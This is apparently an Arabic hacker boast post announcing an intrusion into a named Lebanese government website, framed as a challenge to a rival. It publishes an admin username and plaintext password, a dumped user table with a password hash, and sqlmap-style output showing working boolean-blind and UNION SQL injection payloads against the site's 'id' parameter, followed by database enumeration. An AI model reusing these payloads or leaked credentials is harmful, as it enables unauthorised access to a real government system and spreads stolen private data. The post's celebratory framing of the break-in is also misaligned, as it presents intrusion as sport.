جني محجوز - اختراق موقع حكومي لبناني jbs.gov.lb

1. اختراق موقع حكومي لبناني
2.  
3. www.twitter.com/JM511
4. Follow me
5. BBM: 21EB3DBB
6.  
7. سبب الاختراق
8.  
9. تحدي بسام اللبناني ..
10.  
11. اجل تتحداني يا بسام ؟
12.  
13. الموقع المستهدف : www.jbs.gov.lb
14. اليوزر نيم : admin
15. الباسورد : jeanjbs2012
16.  
17. دع القيادة وتمتع بالاختراق
18. جني محجوز
19. +----------------+----+-----------+--------------+----------------------------------+-----------+----------+
20. | authentication | id | is_locked | login_trials | password | privilege | username |
21. +----------------+----+-----------+--------------+----------------------------------+-----------+----------+
22. | LOCAL | 1 | 0 | 0 | 85e8803b71e5c79ed664e0be55074b57 | 1 | admin |
23. +----------------+----+-----------+--------------+----------------------------------+-----------+----------+
24.  
25.  
26. ---
27. Place: GET
28. Parameter: id
29. Type: boolean-based blind
30. Title: AND boolean-based blind - WHERE or HAVING clause
31. Payload: id=12' AND 8958=8958 AND 'YKjP'='YKjP
32.  
33. Type: UNION query
34. Title: MySQL UNION query (NULL) - 2 columns
35. Payload: id=-8325' UNION ALL SELECT CONCAT(0x3a64696c3a,0x54754644444764717665,0x3a7564693a), NULL# AND 'FWoR'='FWoR
36. ---
37.  
38. [02:13:43] [INFO] testing MySQL
39. [02:13:44] [INFO] confirming MySQL
40. [02:13:47] [INFO] the back-end DBMS is MySQL
41.  
42. web application technology: Apache
43. back-end DBMS: MySQL >= 5.0.0
44. [02:13:47] [INFO] fetching database names
45. [02:13:48] [INFO] the SQL query used returns 2 entries
46. [02:13:49] [INFO] retrieved: "information_schema"
47. [02:13:50] [INFO] retrieved: "jbs_db"
48. available databases [2]:
49. [*] information_schema
50. [*] jbs_db